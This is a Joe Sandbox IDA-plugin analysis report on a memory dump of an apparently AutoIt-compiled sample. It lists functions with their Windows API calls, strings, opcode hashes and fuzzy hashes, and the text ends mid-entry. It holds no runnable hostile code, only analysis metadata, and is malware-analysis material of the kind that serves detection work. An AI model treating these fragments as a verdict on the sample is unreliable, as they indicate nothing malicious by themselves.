Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 8739af0257dc86b25a4d7807a658649d64bd2f55c0986f66fdd62dcc056fcae8
Instruction ID: d0699a20efbd56ded19ee46f85ee4a60b0237fe4a4f69d456a7cd55e7b5d96e0
Opcode Fuzzy Hash: 8739af0257dc86b25a4d7807a658649d64bd2f55c0986f66fdd62dcc056fcae8
Instruction Fuzzy Hash: A9512C61E0C20196CB157714C901BF93BB7DF40740F748D5EF495423A9FB3A8D969A8B

Function 00727771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(006F569E,00000000,?,0073CC08,?,00000000,00000000), ref: 007278DD

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

CharUpperBuffW.USER32(006F569E,00000000,?,0073CC08,00000000,?,00000000,00000000), ref: 0072783B

Strings

<sv, xrefs: 007277C8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <sv
API String ID: 3544283678-1866742746
Opcode ID: 88d45d258526cd439283dcb177838b9d19270bbd82080984e9992a6df935aac5
Instruction ID: 2719ef12dbf4142b5d545e4ae0fa7c60a60d5c05b4627e4333154bc40ddd2099
Opcode Fuzzy Hash: 88d45d258526cd439283dcb177838b9d19270bbd82080984e9992a6df935aac5
Instruction Fuzzy Hash: 57614B72914228AACF48FBE4DD91DFDB379BF15300B444129F542A7191EF38AE49CBA4

Function 006BE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 006BE1B1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: ff2f4bf432a8d9bfe4132cc2001fc11cfe91351041b8c99175a16080483e32e8
Instruction ID: d498d0343c4267ab09f3b0037ba25a3556cdfb5c41fc35754e43c592c5d0c357
Opcode Fuzzy Hash: ff2f4bf432a8d9bfe4132cc2001fc11cfe91351041b8c99175a16080483e32e8
Instruction Fuzzy Hash: B651357550424ADFDB15EF28C4816FA7FA6EF15310F248069F9519B3E0D6369E83CBA0

Function 006BF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 006BF2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 006BF2BB

Strings

@, xrefs: 006BF2AF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 8a3460f0d368455acd96c9631a9675e70b5470ff22ccae4e73a992ff0629645b
Instruction ID: 47adc3b50507cccab70cc0f8a9a120fe0df1137806193d7eedc84049402fbd54
Opcode Fuzzy Hash: 8a3460f0d368455acd96c9631a9675e70b5470ff22ccae4e73a992ff0629645b
Instruction Fuzzy Hash: 7E5155714087449FD360AF10DC86BABBBF9FFC5311F81884CF199411A5EB709929CB6A

Function 00725745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007257E0
_wcslen.LIBCMT ref: 007257EC

Strings

CALLARGARRAY, xrefs: 007257E6, 007257EB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: e78b0c1275a06b28b32cdada61e6ea25d6d6c6b56fc03766f0f7f90210dc940b
Instruction ID: 1ca4833f12977a7e57f3f1131e7467ff8c43b1360961df917bb079ba9e2b9047
Opcode Fuzzy Hash: e78b0c1275a06b28b32cdada61e6ea25d6d6c6b56fc03766f0f7f90210dc940b
Instruction Fuzzy Hash: F541AE71A00219DFCB04EFA8D8858BEBBF5FF59320F10412DE505AB291E7789D81CBA0

Function 0071D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0071D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0071D13A

Strings

|, xrefs: 0071D10B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: b081ea02184302a211d628678fecbb037cb01e53efa27388ee23cc059e99d891
Instruction ID: d5d04fed221c9a48561f98829a212e64ff3283cf51d3883e79be08875709a305
Opcode Fuzzy Hash: b081ea02184302a211d628678fecbb037cb01e53efa27388ee23cc059e99d891
Instruction Fuzzy Hash: 89314C71D00219ABCF55EFA4CC85AEEBFBAFF05304F000019F915A6161EB35AA46DF64

Function 0073356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00733621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0073365C

Strings

static, xrefs: 007335BC

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 72ac8f72751d4ba2bdf03acf71cf2c5ecc140561ba7fa36424d601e69bc398c0
Instruction ID: e92b48c008ba8289c84592fb4b4fd11d28e21c16e2dce4cd9a2c3078971cc167
Opcode Fuzzy Hash: 72ac8f72751d4ba2bdf03acf71cf2c5ecc140561ba7fa36424d601e69bc398c0
Instruction Fuzzy Hash: 09318F71110204AEEB209F38DC41EFB73A9FF88720F00961DF8A5D7291DA39AD91C764

Function 00734537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0073461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00734634

Strings

', xrefs: 0073458E

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f7924947cd4043820ad57696475f9a79a8aaa65c02c5733c0a50822a31dbc231
Instruction ID: bd5460d5464f1494abc2f3d9e8183eda24a51825f66d06cf66b74de01e418e8e
Opcode Fuzzy Hash: f7924947cd4043820ad57696475f9a79a8aaa65c02c5733c0a50822a31dbc231
Instruction Fuzzy Hash: 9C312775A01219DFEB18CFA9C981BDABBB5FF09300F10406AE904AB342D774A951CF90

Function 006A3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 006E33A2

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 006A3A04

Strings

Line: , xrefs: 006E33EB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 11f13b0b19c74a0438f4e1eea13fff8d54af48422ea7d2bcd4fc361f441e3201
Instruction ID: 9d85bd5a73601396813d2215ffab5430875e83b900dd91c9d49abf55c89b9706
Opcode Fuzzy Hash: 11f13b0b19c74a0438f4e1eea13fff8d54af48422ea7d2bcd4fc361f441e3201
Instruction Fuzzy Hash: 7D310471408360AEC761FB24DC46FEBB7D9AB41350F00452EF59983291EB749A49CBDA

Function 007331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0073327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00733287

Strings

Combobox, xrefs: 00733249

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 80ff142f0180c3eadb1b048b1c4e0e4c49b356d9245d7093901fd99a9c210b6c
Instruction ID: d656f0d648cca27ed5edef75a0d3f104a82580140acc889cdff4c24a0d6cd8b2
Opcode Fuzzy Hash: 80ff142f0180c3eadb1b048b1c4e0e4c49b356d9245d7093901fd99a9c210b6c
Instruction Fuzzy Hash: 1C11B271300208BFFF259E54DC85EBB376AFB943A4F104228F9189B292D6799D518B60

Function 00733710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 006A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
Part of subcall function 006A600E: GetStockObject.GDI32(00000011), ref: 006A6060
Part of subcall function 006A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A

GetWindowRect.USER32(00000000,?), ref: 0073377A
GetSysColor.USER32(00000012), ref: 00733794

Strings

static, xrefs: 00733757

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 8938b27d672b622aba348ddfe525119fc029c81fd2b4a73af667b70d47a17637
Instruction ID: 0f02cc29e91ff60009b56d32336371a543b1772bdf16210bbdef576eb218b406
Opcode Fuzzy Hash: 8938b27d672b622aba348ddfe525119fc029c81fd2b4a73af667b70d47a17637
Instruction Fuzzy Hash: 15113AB2610209AFEF11DFB8CC46EFA7BB8FB09354F004518F955E2251D739E8619B50

Function 0071CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0071CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0071CDA6

Strings

<local>, xrefs: 0071CD66

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d5611ccf024b875ea371f7560577cebe58250e06c1e20ac77f06badf47ddd419
Instruction ID: d826f91e8164e0d40a33be94d004a9761df9b81b87a214f3b318d770ce0b24c9
Opcode Fuzzy Hash: d5611ccf024b875ea371f7560577cebe58250e06c1e20ac77f06badf47ddd419
Instruction Fuzzy Hash: 5F11C6B13856317AD7364BAA9C45EE7BE6CEF127A4F404226B589931C0D7789880D6F0

Function 00733429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007334AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007334BA

Strings

edit, xrefs: 0073348F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 032a9317d87f32e094d2b996f7224adf73b5d45a32df801df8a9cd171a72b331
Instruction ID: 6a4752b9bd628c76bc7483207769ade15b667a4e164ddd38758bb9721ce5fda9
Opcode Fuzzy Hash: 032a9317d87f32e094d2b996f7224adf73b5d45a32df801df8a9cd171a72b331
Instruction Fuzzy Hash: CE118C71100248ABFB228F64DC44ABB376AEB05374F508324F965A31E2C779EC919B64

Function 00706C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00706CB6
_wcslen.LIBCMT ref: 00706CC2

Strings

STOP, xrefs: 00706CBC, 00706CC1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 7fdfe912587f236c62627953dfc725fefe5e014bf2b10dcca54082272902171b
Instruction ID: d62c44138015cb7e813d5ad0481e7fe3c7554d8ff28cbfadafe9fa1f0b3bb63d
Opcode Fuzzy Hash: 7fdfe912587f236c62627953dfc725fefe5e014bf2b10dcca54082272902171b
Instruction Fuzzy Hash: 8A010432600526CBDB20AFBDDCA09BF37F5EA617107100629E852D61D0EB39EC20C660

Function 00701BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 00703CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00703CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00701C46

Strings

ComboBox, xrefs: 00701BE5
ListBox, xrefs: 00701C10

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: d294892f81f5a38de2a27d4562fa79c088066476d2ee0eaa268ca9da7de566f8
Instruction ID: bc815129f9de1db41dea1faa9e7e9bd2fd416a79f76ed1abbb6fba9998c3d6e4
Opcode Fuzzy Hash: d294892f81f5a38de2a27d4562fa79c088066476d2ee0eaa268ca9da7de566f8
Instruction Fuzzy Hash: 5B01F7B1680104E7EB08FB90C962DFF73E89B12340F500519B816732C2EA28DE4887B5

Function 006BA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 006BA529

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Strings

3yo, xrefs: 006BA545, 006BA54D, 006BA552
,%w, xrefs: 006BA509

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%w$3yo
API String ID: 2551934079-2742024474
Opcode ID: fc54703227c2c0ebe72bd0839bccc9a957028deec153468e01d2f5970160da5a
Instruction ID: ee4f5bd71e4da42e349e96b56d8315903e9719f36d3230e36a5bddc59dfe892b
Opcode Fuzzy Hash: fc54703227c2c0ebe72bd0839bccc9a957028deec153468e01d2f5970160da5a
Instruction Fuzzy Hash: 6D01F77270061497DA24F7A8D81BAED3397DB05750F50406CF516572C3DE149E828BAF

Function 00738172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00773018,0077305C), ref: 007381BF
CloseHandle.KERNEL32 ref: 007381D1

Strings

\0w, xrefs: 0073818A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0w
API String ID: 3712363035-2344672426
Opcode ID: 3ecd2480ee3a11ffef7800158cf322f60cf33ae3a8c269de393054e0365e5d58
Instruction ID: 027307d08a05b4c24128c536850dd9d17de4fcefc19e8f939d3087dec99fabd6
Opcode Fuzzy Hash: 3ecd2480ee3a11ffef7800158cf322f60cf33ae3a8c269de393054e0365e5d58
Instruction Fuzzy Hash: 49F05EB2640304BAF6206761AC45FB73A5EDB05791F008425BB0CE51A2D67E8A50E3BD

Function 0072747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00727493
_wcslen.LIBCMT ref: 007274B9

Strings

3, 3, 16, 1, xrefs: 00727483

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 2dda1119b763f502f0c07759c560333b3ecbfe427bfc41b488aab71c0fd36c28
Instruction ID: d548fcea76ba1f3d0126bc40bbcd8332caba2db2eae15de1e3a7daf8deebef6e
Opcode Fuzzy Hash: 2dda1119b763f502f0c07759c560333b3ecbfe427bfc41b488aab71c0fd36c28
Instruction Fuzzy Hash: 11E02B026042B0509279327ABDC1EBF578ACFC5790710182FF981C2266EEA88D91D3E4

Function 00700B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00700B23

Strings

AutoIt, xrefs: 00700B17
Error allocating memory., xrefs: 00700B1C

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 674ab2bf5dedd2e37f82710f326fe3f10044ec15409984c3e77ca128b383d7bf
Instruction ID: b27f989f0bb24b3be928530f97b0950274c1b1f0a970affeacad3dc852357371
Opcode Fuzzy Hash: 674ab2bf5dedd2e37f82710f326fe3f10044ec15409984c3e77ca128b383d7bf
